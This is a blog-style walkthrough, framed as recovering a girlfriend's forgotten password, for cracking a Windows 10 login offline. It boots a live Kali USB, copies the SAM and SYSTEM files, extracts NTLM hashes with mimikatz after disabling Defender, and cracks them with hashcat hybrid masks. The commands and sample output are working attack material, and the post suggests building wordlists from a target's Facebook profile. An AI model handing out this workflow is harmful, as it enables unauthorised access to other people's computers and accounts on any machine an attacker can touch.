Recently, my girlfriend forgot her Windows 10 password, locking her out of her almost-brand-new laptop. I took it as a personal challenge to break into the Windows security layer and extract her password. Resetting the password was not an option!
With Windows 10 Anniversary Update, things got tougher when it comes to cracking Windows password but after trying different approaches, I managed to do it. Here’s a guide to show you the steps to follow.
TLDR; We’ll be cracking Windows 10 password without admin access, and this method works with Windows 10 Anniversary Update!
Requirement: a password-locked computer, a not-password-locked computer, one (or two) USB keys.
- Retrieve the encrypted Windows 10 password database: SAM and SYSTEM files
- Extract Windows 10 password hash from those files using mimikatz
- Crack the hash quickly using hashcat
Part I – Retrieving SAM and SYSTEM files from Windows
To extract those files without needing to log-in onto the computer, we’ll need to start the system using an OS stored on a USB key. Then we’ll be able to access the Windows file system.
Step 1 – Booting on a Live USB OS
You can download Kali Linux Light here: Kali Linux download page.
Flash the .iso on the USB using software like ISO to USB or Rufus.
Now you can boot on the ISO. To do so, turn off the computer you want to crack and plug-in the USB key. Then start the computer and enter the BIOS by pressing the F11 or DELETE key. Reorder devices in Boot Priority, putting your USB key on top.
You will probably have to enable Legacy Support in your BIOS.
You can then Save and exit (F10), and proceed to booting on the OS.
Step 2 – Accessing Windows file system
Once the live OS is loaded, open-up a file manager. Your WINDOWS partition might be available as read-only. If that’s the case, you can jump directly to Step 3.
If Windows partition is not available, do the following:
Find the correct device to mount.
$ fdisk -l Device Boot Start End Sectors Size System /dev/sdb1 269 10382 81232672 260M EFI System /dev/sdb2 10383 19452 72846742 16M Microsoft reserved /dev/sdb3 10383 11034 5229157 118G Microsft basic data /dev/sda7 11035 19439 67505130 980M Windows recovery environment
You can deduce which device is the main Windows partition by looking the Size column. Here 118G is the one we’re looking for, as the SSD capacity is 128 GB.
Also, you might have multiple physical disks, so it’s up to you to choose the right one.
In this case, the device we want to mount is /dev/sdb3.
Then you can mount the drive to the Linux file system:
$ mkdir /media/windows $ sudo ntfs-3g -o remove_hiberfile /dev/sdb3 /media/windows
If the second command fails, you can do:
$ sudo ntfsfix /dev/<span style="text-decoration: underline;">sdb3</span> Mounting volume... Windows is hibernated, refused to mount. FAILED Attempting to correct errors... Processing $MFT and $MFTMirr... Reading $MFT... OK Reading $MFTMirr... OK Comparing $MFTMirr to $MFT... OK Processing of $MFT and $MFTMirr completed successfully. Setting required flags on partition... OK Going to empty the journal ($LogFile)... OK Windows is hibernated, refused to mount. Remount failed: Operation not permitted
Even if the “Remount failed“, we can still mount the Windows partition using:
$ sudo <span class="__in">ntfs</span>-<span class="__in">3g</span> -o remove_hiberfile /dev/<span style="text-decoration: underline;">sdb3</span> /media/windows $ cd /media/windows $ ls
Now, if you mounted the correct device, the ls command should display a list of familiar directories : “Windows”, “Program Files (x86)”, “Users”.
Step 3 Dumping SAM and SYSTEM files
Now, assuming that we successfully mounted Windows partition in /media/windows, you can copy the following files onto a USB key:
Those two files will be needed to retrieve the hash of your Windows 10 password.
You can now log-out of the live OS, we’re done for this part.
Part II – Getting the hash
This part will be much quicker, but that’s were the Windows 10 Anniversary Update can cause troubles if you’re not using the right software.
First, disable Windows Defender Real-time Protection (Windows start menu -> Search “Windows Defender” -> Windows Defender Security Center -> Virus &amp; threat protection -> Virus &amp; threat protection settings -> Turn-off “Real-time Protection”).
Then, download and extract the latest mimikatz release: Mimikatz releases page.
Copy the SAM and SYSTEM files into mimikatz/x64.
Now open a terminal in mimikatz/x64 directory (you can do that by typing “cmd” in the Windows explorer address bar)
C:\Users\me\Downloads\mimikatz\x64> mimikatz.exe .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( firstname.lastname@example.org ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # lsadump::sam /system:SYSTEM_export /SAM:SAM_export
Where SYSTEM_export and SAM_export are the files we copied in the previous step.
Even if we can’t retrieve the actual Windows 10 password right now, the tool can provide us with its hash. It will list the available users and their respective hashes. Find the one you want to crack and you’re good to go to next part.
Part III – Cracking the hash
Download hashcat: grab the binaries here.
Now, we have to gather as much information as we can about the password we’re about to crack. By doing so, it will allow the cracking tool to go significantly faster.
You should first ask the owner of the device what kind of Windows password they usually use, in order to get a rough idea of its structure. If the password is not completely random, you can take advantage of a dictionary to leverage your brute-force power in a more clever way. With hashcat, this is called a hybrid attack.
For instance, in my case, the forgotten password was probably a common name, followed by a bunch of random-ish letters/numbers (ie: tomsdev54d). Assuming you stored the hash in phihash.txt and that you have a dictionary file phidict.log, here’s the hashcat command to match this kind of password:
hashcat64.exe -m 1000 -a 6 phihash.txt phidict.log ?a?a?a
If the dictionary contains “tomsdev”, the password will be cracked in less a minute and the result will be available in the following file hashcat.potfile!
Session..........: hashcat Status...........: Cracked Hash.Type........: NTLM Hash.Target......: phihash.txt Time.Started.....: Tue Dec 05 17:00:33 2017 (5 secs) Time.Estimated...: Tue Dec 05 17:00:38 2017 (0 secs) Guess.Base.......: File (phidict.log), Left Side Guess.Mod........: Mask (?a?a?a) , Right Side Guess.Queue.Base.: 1/1 (100.00%) Guess.Queue.Mod..: 1/1 (100.00%) Speed.Dev.#1.....: 2674.4 MH/s (4.25ms) Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 13245574144/22427215250 (59.06%) Rejected.........: 0/13245574144 (0.00%) Restore.Point....: 0/26158 (0.00%) Candidates.#1....: ≡ƒÿï,bS -> logof1K HWMon.Dev.#1.....: Temp: 52c Fan: 33% Util: 86% Core:1885MHz Mem:3802MHz Bus:16 Started: Tue Dec 05 17:00:31 2017 Stopped: Tue Dec 05 17:00:40 2017
Searching more efficiently
If we had to use brute-force to find this 10-characters password, it would have probably taken days. Instead, we’re searching for all combinaisons of “<dictionary word><up to 3 random characters>“. This is roughly equivalent in terms of complexity to a password length of 4. You can then tweak the pattern according to your needs (see hashcat documentation for more information).
For instance, you have to change the command to match a slightly different pattern:
<up to 3 random characters><dictionary word> hashcat64.exe -m 1000 -a 6 phihash.txt ?a?a?a phidict.log
Which dictionary should I use?
As I mentioned, this is completely up to the kind of password you want to crack. I recommend using at least a localized dictionary that matches the user’s mother-tongue.
But a better way of doing this is to build a custom dictionary with the user’s own word, names, places, nicknames, etc. That’s what I did using Facebook, and it worked wonders, saving me countless days of brainless brute-forcing and wasted GPU cycles.
I hope that this guide helped you retrieving your lost Windows password and that you had fun acting hacker-ish while doing it. Feel free to ask any questions in comments.